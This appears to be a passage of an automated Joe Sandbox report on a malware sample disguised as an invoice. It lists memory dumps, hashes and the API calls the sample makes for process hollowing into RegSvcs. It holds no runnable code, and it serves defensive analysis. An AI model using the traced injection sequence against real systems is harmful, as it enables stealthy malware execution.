                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 983334009-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072B27DE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 983334009-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072B2CC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1726664587-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072B2CC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1726664587-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9D619,00000800,00000000,00000000), ref: 02E9D82A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1029625771-359210496
                                                                                                                              • Opcode ID: 722e654ae07c13f80ed872357ffd509b2a873ce992ce3eb384a2a12fef7b6f65
                                                                                                                              • Instruction ID: 4dc5d51220636c391218fbf3ef082df1e723d6dc420d6454e8cf21a99fb8b8d4
                                                                                                                              • Opcode Fuzzy Hash: 722e654ae07c13f80ed872357ffd509b2a873ce992ce3eb384a2a12fef7b6f65
                                                                                                                              • Instruction Fuzzy Hash: 7B1114B6D003598FDB20DF9AD844BEEFBF4EB88714F10842AD919A7200C375A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072B2B06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4275171209-359210496
                                                                                                                              • Opcode ID: f3529ffa58912f532a74f8eef3e01611125a1b71e00333eff88476ef31ecd391
                                                                                                                              • Instruction ID: 2b4b95dbbd0fde256ddf6538097b047dc36d951d42801d93e42822c6f6e8ba6b
                                                                                                                              • Opcode Fuzzy Hash: f3529ffa58912f532a74f8eef3e01611125a1b71e00333eff88476ef31ecd391
                                                                                                                              • Instruction Fuzzy Hash: 571156B69003499FDB20DFAAD844BEEBBF5BF48310F248819D559A7250CB759541CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 947044025-359210496
                                                                                                                              • Opcode ID: 8c897c0c7691a222c29343d92c884f076d30ec26d8f0fcde717fb4c1fb14f631
                                                                                                                              • Instruction ID: 196e093952b5a8f5b354b8b816044cbdf36a75d7f596e22282d811736e1638ed
                                                                                                                              • Opcode Fuzzy Hash: 8c897c0c7691a222c29343d92c884f076d30ec26d8f0fcde717fb4c1fb14f631
                                                                                                                              • Instruction Fuzzy Hash: D8116AB1D003498FDB24DFAAC8457DEFBF5EF88320F248819D419A7240CB79A941CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9D619,00000800,00000000,00000000), ref: 02E9D82A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1029625771-359210496
                                                                                                                              • Opcode ID: 3c36dfd46be5c8761e717172b46970b95e3dc9e1adcfaa3f461195fc3e7caa1b
                                                                                                                              • Instruction ID: 9b5ffc090de56676975a87954eacdf0d9fddfb22c012460275ed26e107bc55d4
                                                                                                                              • Opcode Fuzzy Hash: 3c36dfd46be5c8761e717172b46970b95e3dc9e1adcfaa3f461195fc3e7caa1b
                                                                                                                              • Instruction Fuzzy Hash: 081112B6D003498FDB24DFAAD944BEEFBF4AB48314F14842AD819A7201C378A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              • Opcode ID: f217622514d9f86b0c36afa676fd38b6f1cba895a8346bcd5327000b1626c961
                                                                                                                              • Instruction ID: 1ae2163806ca65191778321193d450387150758f31411def25999516dc043b11
                                                                                                                              • Opcode Fuzzy Hash: f217622514d9f86b0c36afa676fd38b6f1cba895a8346bcd5327000b1626c961
                                                                                                                              • Instruction Fuzzy Hash: D2113AB58103498FDB20DF9AD444BDEBBF5EB48320F148419D958A7341D778A944CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 947044025-359210496
                                                                                                                              • Opcode ID: 487221b232fe8d6633833ae636d229bf478f7ded7811b109d0a3ae5f9cad6fdb
                                                                                                                              • Instruction ID: c3a57b64865289a5e54ea66f2e43d2d99da5a7d16c507b68982bdc8da92f0cd2
                                                                                                                              • Opcode Fuzzy Hash: 487221b232fe8d6633833ae636d229bf478f7ded7811b109d0a3ae5f9cad6fdb
                                                                                                                              • Instruction Fuzzy Hash: D81136B1D003498FDB24DFAAD4447EEFBF5EF88324F248819D419A7240CB79A945CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9D59E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4139908857-359210496
                                                                                                                              • Opcode ID: 986343793c1ee300091b56d3250230945b43f8ea15e185b23693490171f0b64d
                                                                                                                              • Instruction ID: c59cd2b6e4a7861d46ddcbbdbaefcfb6b4955a2e0025925d68123b801f6bfd75
                                                                                                                              • Opcode Fuzzy Hash: 986343793c1ee300091b56d3250230945b43f8ea15e185b23693490171f0b64d
                                                                                                                              • Instruction Fuzzy Hash: EE1102B6C003598FDB20DF9AD844BDEFBF4AB88218F10841AD818A7200D375A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 072B45BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 410705778-359210496
                                                                                                                              • Opcode ID: 587d67a394d82b6afdf843615db7abc10a659f134e99ff6c32ba5c0cd55ccd27
                                                                                                                              • Instruction ID: fd14e297860e7b46998c2fd6adc19f7741c16de0c3bc27048ac3aa516f8dea61
                                                                                                                              • Opcode Fuzzy Hash: 587d67a394d82b6afdf843615db7abc10a659f134e99ff6c32ba5c0cd55ccd27
                                                                                                                              • Instruction Fuzzy Hash: 0C1103B58007499FDB20DF9AD885BDEBBF8EB48314F10841AE918A7201C375A954CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 072B45BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 410705778-359210496
                                                                                                                              • Opcode ID: 0889d373122fc62ca0274bc0bdf3cc8a8ebd1eeb22dfbcf0e54ec9401b76ad8e
                                                                                                                              • Instruction ID: 24423815a49ef3de4265ebba3ebf1f77568e34f60839c49907ba1cd0ef9258d1
                                                                                                                              • Opcode Fuzzy Hash: 0889d373122fc62ca0274bc0bdf3cc8a8ebd1eeb22dfbcf0e54ec9401b76ad8e
                                                                                                                              • Instruction Fuzzy Hash: 341115B68003499FDB20DF9AD885BDEFBF8EB48320F108419E918A7751C375A544CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              • Opcode ID: 404a238f4a24f265ab65e7fbe1abd18d19c6f9d9239bb3f6e8ff9612492c6537
                                                                                                                              • Instruction ID: ce912a492e27c9166af88ff8036a75b508bfaafcbf7177878354a0ea84cc303c
                                                                                                                              • Opcode Fuzzy Hash: 404a238f4a24f265ab65e7fbe1abd18d19c6f9d9239bb3f6e8ff9612492c6537
                                                                                                                              • Instruction Fuzzy Hash: DF1136B68003498FDB20DF9AD545BEEBBF5EB48320F24841AD958A7640C778A545CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 054E6621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262643375.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2d0d000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262595676.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2cfd000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                              Signature Coverage:11%
                                                                                                                              Total number of Nodes:401
                                                                                                                              Total number of Limit Nodes:39
40a7a3 95819->95823 95820->95787 95822 427e40 95822->95787 95826 40a7c8 95823->95826 95824 40a8e5 NtCreateSection 95825 40a914 95824->95825 95825->95822 95826->95824 95830 40a9e8 95827->95830 95828 40ab05 NtMapViewOfSection 95829 40ab40 95828->95829 95829->95800 95830->95828 95834 40a3a8 95831->95834 95832 40a4c5 NtResumeThread 95833 40a4e0 95832->95833 95833->95810 95834->95832 95835 401c39 95836 401be2 95835->95836 95837 401c3d 95835->95837 95840 42b963 95836->95840 95843 429fd3 95840->95843 95844 429ff9 95843->95844 95855 416483 95844->95855 95846 42a00f 95854 401c08 95846->95854 95858 41a553 95846->95858 95848 42a02e 95849 42a043 95848->95849 95874 428933 95848->95874 95870 426393 95849->95870 95852 42a052 95853 428933 2 API calls 95852->95853 95853->95854 95857 416490 95855->95857 95878 4163d3 95855->95878 95857->95846 95859 41a57f 95858->95859 95903 4178e3 95859->95903 95861 41a591 95907 41a443 95861->95907 95864 41a5c4 95866 41a5d5 95864->95866 95869 4285d3 2 API calls 95864->95869 95865 41a5ac 95867 41a5b7 95865->95867 95868 4285d3 2 API calls 95865->95868 95866->95848 95867->95848 95868->95867 95869->95866 95871 4263ed 95870->95871 95873 4263fa 95871->95873 95935 418083 95871->95935 95873->95852 95875 42894d 95874->95875 95876 4295c3 LdrLoadDll 95875->95876 95877 42895e ExitProcess 95876->95877 95877->95849 95885 425453 95878->95885 95882 4163f6 95884 416403 95882->95884 95892 428f53 95882->95892 95884->95857 95886 425462 95885->95886 95887 423f93 LdrLoadDll 95886->95887 95888 4163ea 95887->95888 95889 4254a3 95888->95889 95899 428843 95889->95899 95894 428f6b 95892->95894 95893 428f8f 95893->95884 95894->95893 95895 427cf3 2 API calls 95894->95895 95896 428fe4 95895->95896 95897 42a3e3 2 API calls 95896->95897 95898 428ffd 95897->95898 95898->95884 95900 428860 95899->95900 95901 4295c3 LdrLoadDll 95900->95901 95902 4254c0 95901->95902 95902->95882 95904 417929 95903->95904 95917 417773 LdrLoadDll 95904->95917 95906 4179bc 95906->95861 95908 41a45d 
95907->95908 95916 41a539 95907->95916 95918 417833 95908->95918 95910 41a4a2 95923 427d43 95910->95923 95912 41a4e7 95927 427d93 95912->95927 95915 4285d3 2 API calls 95915->95916 95916->95864 95916->95865 95917->95906 95919 417858 95918->95919 95922 417863 95919->95922 95933 417773 LdrLoadDll 95919->95933 95921 4178ab 95921->95910 95922->95910 95924 427d5d 95923->95924 95925 4295c3 LdrLoadDll 95924->95925 95926 427d6e 95925->95926 95926->95912 95928 427db0 95927->95928 95929 4295c3 LdrLoadDll 95928->95929 95930 427dc1 95929->95930 95934 14a35c0 LdrInitializeThunk 95930->95934 95931 41a52d 95931->95915 95933->95921 95934->95931 95937 4180ad 95935->95937 95960 41851b 95937->95960 95961 423493 95937->95961 95938 41814c 95938->95960 95964 413e93 95938->95964 95940 4181ba 95941 42a3e3 2 API calls 95940->95941 95940->95960 95943 4181d2 95941->95943 95942 418204 95944 41a5e3 3 API calls 95942->95944 95948 41820b 95942->95948 95943->95942 95977 406ca3 95943->95977 95945 418244 95944->95945 95947 427e93 2 API calls 95945->95947 95945->95960 95947->95948 95948->95960 95981 427983 95948->95981 95950 4182a1 95990 427a03 95950->95990 95952 4182c1 95953 4184aa 95952->95953 95999 406d13 95952->95999 95954 427b03 2 API calls 95953->95954 95956 4184cd 95953->95956 95954->95956 95958 4184ea 95956->95958 96003 41a7b3 95956->96003 95959 428933 2 API calls 95958->95959 95959->95960 95960->95873 96007 42a353 95961->96007 95963 4234b4 95963->95938 95965 413ef9 95964->95965 95970 413eb2 95964->95970 95966 414007 95965->95966 95976 413fd0 95965->95976 96023 413633 95965->96023 95966->95940 95969 413fe4 95969->95966 96041 41a853 LdrLoadDll RtlFreeHeap LdrInitializeThunk 95969->96041 95970->95965 95970->95966 95971 41a7b3 2 API calls 95970->95971 95971->95970 95973 413ffd 95973->95940 95974 413f36 95974->95976 96036 4138f3 95974->96036 95976->95966 96040 41a853 LdrLoadDll RtlFreeHeap LdrInitializeThunk 95976->96040 95978 406cd3 95977->95978 95979 41a7b3 2 API calls 95978->95979 95980 
406cf4 95978->95980 95979->95978 95980->95942 95982 4279d3 95981->95982 95983 4279a1 95981->95983 95984 4295c3 LdrLoadDll 95982->95984 95985 4295c3 LdrLoadDll 95983->95985 95986 4279e9 95984->95986 95987 4279bb 95985->95987 95986->95950 96056 409f63 95987->96056 95989 4279cc 95989->95950 95991 427a53 95990->95991 95992 427a21 95990->95992 95993 4295c3 LdrLoadDll 95991->95993 95994 4295c3 LdrLoadDll 95992->95994 95995 427a69 95993->95995 95996 427a3b 95994->95996 95995->95952 96060 40a173 95996->96060 95998 427a4c 95998->95952 96001 406d33 95999->96001 96000 41a7b3 2 API calls 96000->96001 96001->96000 96002 406d53 96001->96002 96002->95953 96004 41a7c6 96003->96004 96064 427c23 96004->96064 96006 41a7f1 96006->95956 96010 428703 96007->96010 96009 42a384 96009->95963 96011 428766 96010->96011 96012 428724 96010->96012 96013 4295c3 LdrLoadDll 96011->96013 96014 4295c3 LdrLoadDll 96012->96014 96017 42877c 96013->96017 96015 42873e 96014->96015 96019 40b6b3 96015->96019 96017->96009 96018 42875f 96018->96009 96022 40b6d8 96019->96022 96020 40b7f5 NtAllocateVirtualMemory 96021 40b820 96020->96021 96021->96018 96022->96020 96024 413643 96023->96024 96025 41363e 96023->96025 96026 42a353 2 API calls 96024->96026 96025->95974 96033 413668 96026->96033 96027 4136cf 96027->95974 96029 4136d5 96030 4136ff 96029->96030 96032 4287f3 2 API calls 96029->96032 96030->95974 96034 4136f0 96032->96034 96033->96027 96033->96029 96035 42a353 2 API calls 96033->96035 96042 427ca3 96033->96042 96048 4287f3 96033->96048 96034->95974 96035->96033 96037 41390f 96036->96037 96038 4287f3 2 API calls 96037->96038 96039 413915 96038->96039 96039->95976 96040->95969 96041->95973 96043 427cbd 96042->96043 96044 4295c3 LdrLoadDll 96043->96044 96045 427cce 96044->96045 96054 14a2df0 LdrInitializeThunk 96045->96054 96046 427ce5 96046->96033 96049 42880d 96048->96049 96050 4295c3 LdrLoadDll 96049->96050 96051 42881e 96050->96051 96055 14a2c70 LdrInitializeThunk 96051->96055 96052 428835 96052->96033 
96054->96046 96055->96052 96059 409f88 96056->96059 96057 40a0a5 NtGetContextThread 96058 40a0c0 96057->96058 96058->95989 96059->96057 96063 40a198 96060->96063 96061 40a2b5 NtSetContextThread 96062 40a2d0 96061->96062 96062->95998 96063->96061 96065 427c76 96064->96065 96066 427c44 96064->96066 96068 4295c3 LdrLoadDll 96065->96068 96067 4295c3 LdrLoadDll 96066->96067 96069 427c5e 96067->96069 96070 427c8c 96068->96070 96073 40b293 96069->96073 96070->96006 96072 427c6f 96072->96006 96076 40b2b8 96073->96076 96074 40b3d5 NtDelayExecution 96075 40b3f1 96074->96075 96075->96072 96076->96074 96077 418738 96078 4285d3 2 API calls 96077->96078 96079 418742 96078->96079 95656 14a2b60 LdrInitializeThunk

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,dn@,?,?,?,00000000), ref: 0040AB2D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionView
